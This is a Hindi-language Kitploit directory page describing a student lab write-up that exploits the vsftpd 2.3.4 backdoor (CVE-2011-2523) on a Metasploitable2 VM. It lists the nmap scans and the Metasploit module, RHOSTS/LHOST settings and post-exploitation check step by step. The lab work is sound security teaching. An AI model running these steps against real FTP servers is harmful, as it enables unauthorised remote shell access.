Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/chathura123git/ethical-hacking-cve-2011-2523
भेद्यता विश्लेषणशोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubchathura123git/ethical-hacking-cve-2011-2523

ethical-hacking-CVE-2011-2523

नैतिक हैकिंग मूल्यांकन | Metasploitable2 पर vsftpd 2.3.4 बैकडोर (CVE-2011-2523) का Kali Linux और Metasploit का उपयोग करके व्यावहारिक भेद्यता परीक्षण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

नैतिक हैकिंग | मूल्यांकन 1

व्यावहारिक भेद्यता परीक्षण - CVE-2011-2523 (vsftpd 2.3.4 बैकडोर)

मॉड्यूल: - नैतिक हैकिंग विश्वविद्यालय: लंदन मेट्रोपॉलिटन विश्वविद्यालय कार्यक्रम: BSc (ऑनर्स) साइबर सुरक्षा और फोरेंसिक विज्ञान

कानूनी अस्वीकरण

सभी गतिविधियाँ केवल शैक्षणिक उद्देश्यों के लिए एक नियंत्रित, पृथक आभासी प्रयोगशाला में संचालित की गईं। किसी भी वास्तविक दुनिया के सिस्टम को लक्षित नहीं किया गया। सभी कार्य कंप्यूटर मिसयूज़ एक्ट 1990 का अनुपालन करते हैं।

प्रयोगशाला वातावरण

  • आक्रमणकारी OS: Kali Linux (होस्ट)
  • आक्रमणकारी IP: 192.168.56.1 (vboxnet0)
  • लक्षित VM: Metasploitable2
  • लक्षित IP: 192.168.56.103
  • हाइपरवाइज़र: Oracle VirtualBox
  • नेटवर्क मोड: होस्ट-ओनली (vboxnet0)

चयनित CVE - CVE-2011-2523

  • CVE ID: CVE-2011-2523
  • प्रभावित सॉफ्टवेयर: vsftpd 2.3.4
  • प्रभावित पोर्ट: 21/tcp (FTP)
  • CVSS v3 स्कोर: 9.8 क्रिटिकल
  • आक्रमण वेक्टर: नेटवर्क
  • आवश्यक विशेषाधिकार: कोई नहीं
  • संदर्भ: https://nvd.nist.gov/vuln/detail/CVE-2011-2523

Nmap स्कैन परिणाम

पोर्ट 21/tcp - vsftpd 2.3.4 (लक्ष्य) पोर्ट 22/tcp - OpenSSH 4.7p1 पोर्ट 23/tcp - Linux telnetd पोर्ट 80/tcp - Apache httpd 2.2.8 पोर्ट 139/tcp - Samba smbd 3.X पोर्ट 445/tcp - Samba smbd 3.X पोर्ट 3306/tcp - MySQL 5.0.51a पोर्ट 6667/tcp - UnrealIRCd

शोषण सारांश

चरण 1: nmap -sn 192.168.56.0/24 चरण 2: nmap -sV 192.168.56.103 चरण 3: msfconsole चरण 4: use exploit/unix/ftp/vsftpd_234_backdoor चरण 5: set RHOSTS 192.168.56.103 चरण 6: set LHOST 192.168.56.1 चरण 7: run चरण 8: id && whoami

संदर्भ

  • MITRE (2011) CVE-2011-2523. https://www.cve.org/CVERecord?id=CVE-2011-2523
  • NIST (2019) NVD CVE-2011-2523. https://nvd.nist.gov/vuln/detail/CVE-2011-2523
टूल डाउनलोड करें